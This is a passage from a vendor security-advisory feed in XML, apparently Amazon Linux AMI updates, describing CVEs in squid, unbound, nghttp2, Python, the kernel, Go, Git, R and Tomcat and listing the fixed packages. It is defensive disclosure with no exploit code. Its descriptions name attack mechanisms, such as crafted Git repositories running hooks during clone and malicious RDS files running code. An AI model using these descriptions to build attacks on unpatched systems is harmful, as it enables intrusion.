</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46846" title="" id="CVE-2023-46846" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.55.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.55.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.55.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.55.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.55.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.55.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.55.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.55.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.55.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.55.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.55.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1934</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1934: important priority package update for unbound</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-33655:
An issue was discovered in some DNS recursive resolvers that allows remote attackers to cause a denial of service using a maliciously designed authority and response amplification.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33655" title="" id="CVE-2024-33655" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="unbound" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-libs-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-devel" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-devel-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-debuginfo-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-python-1.6.6-1.6.amzn1.x86_64.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-python-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-debuginfo-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-libs-1.6.6-1.6.amzn1.i686.rpm</filename></package><package name="unbound-devel" version="1.6.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-devel-1.6.6-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1935</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1935: important priority package update for nghttp2</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-28182:
nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library prior to version 1.61.0 keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it accepts per stream. There is no workaround for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28182" title="" id="CVE-2024-28182" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libnghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.9.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.9.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.9.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.9.amzn1.i686.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1936</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1936: important priority package update for python38</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6597:
An issue was found in the CPython `tempfile.TemporaryDirectory` class affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior.
The tempfile.TemporaryDirectory class would dereference symlinks during cleanup of permissions-related errors. This means users which can run privileged programs are potentially able to modify permissions of files referenced by symlinks in some circumstances.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6597" title="" id="CVE-2023-6597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38-debug" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.11.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.11.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1937</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1937: important priority package update for kernel</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-52628:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nftables: exthdr: fix 4-byte stack OOB write
If priv->len is a multiple of 4, then dst[len / 4] can write past
the destination array which leads to stack corruption.
This construct is necessary to clean the remainder of the register
in case ->len is NOT a multiple of the register size, so make it
conditional just like nft_payload.c does.
The bug was added in 4.1 cycle and then copied/inherited when
tcp/sctp and ip option support was added.
Bug reported by Zero Day Initiative project (ZDI-CAN-21950,
ZDI-CAN-21951, ZDI-CAN-21961).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52628" title="" id="CVE-2023-52628" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.343-183.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.343-183.564.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.343" release="183.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.343-183.564.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1938</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1938: important priority package update for golang</title><issued date="2024-05-09 17:43:00" /><updated date="2024-05-15 19:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-17596:
Go before 1.12.11 and 1.3.x before 1.13.2 can panic upon an attempt to process network traffic containing an invalid DSA public key. There are several attack scenarios, such as traffic from a client to a server that verifies client certificates.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17596" title="" id="CVE-2019-17596" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.13.4" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.4-1.57.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.13.4" release="1.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.4-1.57.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.4-1.57.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.13.4" release="1.57.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.4-1.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1939</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1939: important priority package update for git</title><issued date="2024-05-23 21:37:00" /><updated date="2024-05-31 18:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-32465:
Git is a revision control system. The Git project recommends to avoid working in untrusted repositories, and instead to clone it first with `git clone --no-local` to obtain a clean copy. Git has specific protections to make that a safe operation even with an untrusted source repository, but vulnerabilities allow those protections to be bypassed. In the context of cloning local repositories owned by other users, this vulnerability has been covered in CVE-2024-32004. But there are circumstances where the fixes for CVE-2024-32004 are not enough: For example, when obtaining a `.zip` file containing a full copy of a Git repository, it should not be trusted by default to be safe, as e.g. hooks could be configured to run within the context of that repository. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid using Git in repositories that have been obtained via archives from untrusted sources.
CVE-2024-32021:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, when cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the `objects/` directory. Cloning a local repository over the filesystem may creating hardlinks to arbitrary user-owned files on the same filesystem in the target Git repository's `objects/` directory. When cloning a repository over the filesystem (without explicitly specifying the `file://` protocol or `--no-local`), the optimizations for local cloning
will be used, which include attempting to hard link the object files instead of copying them. While the code includes checks against symbolic links in the source repository, which were added during the fix for CVE-2022-39253, these checks can still be raced because the hard link operation ultimately follows symlinks. If the object on the filesystem appears as a file during the check, and then a symlink during the operation, this will allow the adversary to bypass the check and create hardlinks in the destination objects directory to arbitrary, user-readable files. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.
CVE-2024-32020:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, local clones may end up hardlinking files into the target repository's object database when source and target repository reside on the same disk. If the source repository is owned by a different user, then those hardlinked files may be rewritten at any point in time by the untrusted user. Cloning local repositories will cause Git to either copy or hardlink files of the source repository into the target repository. This significantly speeds up such local clones compared to doing a "proper" clone and saves both disk space and compute time. When cloning a repository located on the same disk that is owned by a different user than the current user we also end up creating such hardlinks. These files will continue to be owned and controlled by the potentially-untrusted user and can be rewritten by them at will in the future. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.
CVE-2024-32004:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.
CVE-2024-32002:
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32002" title="" id="CVE-2024-32002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32004" title="" id="CVE-2024-32004" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32020" title="" id="CVE-2024-32020" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32021" title="" id="CVE-2024-32021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32465" title="" id="CVE-2024-32465" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-core" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-core-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.38.4" release="1.81.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.38.4-1.81.amzn1.noarch.rpm</filename></package><package name="git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.38.4-1.81.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.38.4-1.81.amzn1.i686.rpm</filename></package><package name="git-core" version="2.38.4" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.38.4-1.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1940</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1940: important priority package update for R</title><issued date="2024-06-19 18:46:00" /><updated date="2024-06-24 14:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-27322:
Deserialization of untrusted data can occur in the R statistical programming language, on any version starting at 1.4.0 up to and not including 4.4.0, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user's system when interacted with.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27322" title="" id="CVE-2024-27322" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libRmath-static" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-static-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="libRmath-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-java-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-java" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-java-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-core" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-core-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-core-devel-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="libRmath" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/libRmath-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="R-debuginfo" version="3.4.1" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/R-debuginfo-3.4.1-1.53.amzn1.x86_64.rpm</filename></package><package name="libRmath-static" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-static-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-core-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-core-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-java" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-java-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-java-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-core" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-core-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="libRmath" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="libRmath-devel" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/libRmath-devel-3.4.1-1.53.amzn1.i686.rpm</filename></package><package name="R-debuginfo" version="3.4.1" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/R-debuginfo-3.4.1-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1941</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1941: important priority package update for tomcat8</title><issued date="2024-06-19 18:46:00" /><updated date="2024-06-24 14:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-24549:
Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.
Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.
CVE-2024-23672:
